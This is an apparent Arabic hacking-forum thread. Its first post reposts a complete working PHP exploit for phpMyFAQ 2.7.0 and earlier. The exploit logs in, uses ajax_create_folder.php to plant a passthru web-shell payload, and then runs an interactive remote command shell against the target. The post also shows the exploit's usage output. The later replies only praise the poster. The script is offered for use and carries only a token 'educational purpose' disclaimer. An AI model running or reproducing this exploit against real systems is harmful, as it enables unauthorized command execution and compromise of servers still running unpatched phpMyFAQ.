phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution تم ترجمتها

phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution تم ترجمتها


النتائج 1 إلى 6 من 6

الموضوع: phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution تم ترجمتها

  1. #1

    New phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution تم ترجمتها

    السلام عليكم ورحمة الله عيد سعيد عليكم اخوتي

    ثغرة phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution لسا نازلا بتاريخ 2011-11-05 طبعا الثغرة تسمحلك بتطبيق اومر على السرفر رابط الثغرة من هنا

    http://www.exploit-db.com/exploits/18084

    محتواها :

    كود:
    <?php
    
    /*
        ------------------------------------------------------------------------
        phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution Exploit
        ------------------------------------------------------------------------
        
        author............: Egidio Romano aka EgiX
        mail..............: n0b0d13s[at]gmail[dot]com
        software link.....: http://www.phpmyfaq.de/
        
        +-------------------------------------------------------------------------+
        | This proof of concept code was written for educational purpose only.    |
        | Use it at your own risk. Author will be not responsible for any damage. |
        +-------------------------------------------------------------------------+
        
        [-] Vulnerability overview:
        
        All versions of phpMyFAQ <= 2.6.18 and phpMyFAQ <= 2.7.0 are affected by the
        vulnerability that I reported to http://www.exploit-db.com/exploits/18075/
        Successful exploitation of this vulnerability requires authentication.
        
        [-] Disclosure timeline:
        
        [23/10/2011] - Vulnerability discovered
        [24/10/2011] - Issue reported to http://forum.phpmyfaq.de/viewtopic.php?t=13402
        [25/10/2011] - Fix released, more details at http://www.phpmyfaq.de/advisory_2011-10-25.php
        [05/11/2011] - Public disclosure
    
    */
    
    error_reporting(0);
    set_time_limit(0);
    ini_set("default_socket_timeout", 5);
    
    function http_send($host, $packet)
    {
        if (!($sock = fsockopen($host, 80)))
            die( "\n[-] No response from {$host}:80\n");
    
        fwrite($sock, $packet);
        return stream_get_contents($sock);
    }
    
    print "\n+---------------------------------------------------------+";
    print "\n| phpMyFAQ <= 2.7.0 Remote Code Execution Exploit by EgiX |";
    print "\n+---------------------------------------------------------+\n";
    
    if ($argc < 5)
    {
        print "\nUsage......: php $argv[0] <host> <path> <username> <password>\n";
        print "\nExample....: php $argv[0] localhost /";
        print "\nExample....: php $argv[0] localhost /phpmyfaq/\n";
        die();
    }
    
    $host = $argv[1];
    $path = $argv[2];
    
    $payload = "faqusername={$argv[3]}&faqpassword={$argv[4]}";
    $packet  = "POST {$path}?action=login HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cookie: pmf_auth=foo\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n{$payload}";
    
    if (!preg_match("/pmf_auth=([^;]*);/", http_send($host, $packet), $auth)) die("\n[-] Login failed!\n");
    
    $packet  = "GET {$path}admin/editor/plugins/ajaxfilemanager/ajax_login.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cookie: pmf_auth={$auth[1]}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    
    http_send($host, $packet);
    
    $payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
    $packet  = "POST {$path}admin/editor/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cookie: pmf_auth={$auth[1]}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n{$payload}";
    
    http_send($host, $packet);
    
    $packet  = "GET {$path}admin/editor/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cmd: %s\r\n";
    $packet .= "Connection: close\r\n\r\n";
    
    while(1)
    {
        print "\nphpmyfaq-shell# ";
        if (($cmd = trim(fgets(STDIN))) == "exit") break;
        preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
        print $m[1] : die("\n[-] Exploit failed!\n");
    }
    
    ?>


    قم بترمجة الثغرة لعيونكم :


    كود:
    +---------------------------------------------------------+
    | phpMyFAQ <= 2.7.0 Remote Code Execution Exploit by EgiX |
    +---------------------------------------------------------+
    
    Usage......: php exploit.php <host> <path> <username> <password>
    
    Example....: php exploit.php localhost /
    Example....: php exploit.php localhost /phpmyfaq/


    والسلام عليكم ورحمة الله .



    Iam BACK PEOPLE

    Ace 2010-2017

  2. #2

    افتراضي رد: phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution تم ترجمتها

    سلمت يدااك

    والله يعطيك 1000 عاافيه

    تحياتي لك


    إن المحبة الصادقة كعلاقة اليد بالعين إذا تألمت اليد دمعت العين وإذا دمعت العين مسحتها اليد

  3. #3
    هكر مجتهد الصورة الرمزية حبوط
    تاريخ التسجيل
    Dec 2010
    الدولة
    الســــــعودية
    المشاركات
    480

    افتراضي رد: phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution تم ترجمتها

    بطل بطل بطل يعطيك الف عاافيه جاري دعسك بخمس نجوووم

  4. #4
    هكر نشيط الصورة الرمزية fontom
    تاريخ التسجيل
    Aug 2010
    الدولة
    المغرب الحبيب
    المشاركات
    189

    افتراضي رد: phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution تم ترجمتها

    دائما متميز اخي اكسس الله ينورك عيد مبارك سعيد
    صمتي ليس هو جهلي..
    لاكن اغلب ما يدور حولي... لا يستحق الكلام


    email: [email protected]

  5. #5
    محظور
    تاريخ التسجيل
    Feb 2010
    الدولة
    السـعــوديــُـــُـے -
    المشاركات
    1,086

    افتراضي رد: phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution تم ترجمتها

    كل عااام وانت بالف خير حبيبي

    ثغره حلوه والشخص اروع ابداع ياابطل

    جاري تقييمك ان امكن

  6. #6

    افتراضي رد: phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution تم ترجمتها

    مروركم شرف لي ووسام اضعه على صدري بارك الله فيكم على الردود العطرة .

    Iam BACK PEOPLE

    Ace 2010-2017

المواضيع المتشابهه

  1. شرح استغلال ثغرات command execution
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 46
    آخر مشاركة: 12-11-2011, 03:42 PM
  2. ثغرة remote command execution
    بواسطة angel2486 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 1
    آخر مشاركة: 11-25-2010, 07:39 PM
  3. ثغره جديده للمتصفح 7 Remote Code Execution
    بواسطة Spy4Man في المنتدى منتدى الإختراق العام
    مشاركات: 4
    آخر مشاركة: 08-24-2010, 05:43 AM
  4. استغلال ثغرات Command ExecuTion
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 6
    آخر مشاركة: 08-09-2010, 10:06 PM
  5. Remote Command Execution
    بواسطة الهكر المجهول في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 01-22-2010, 10:06 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •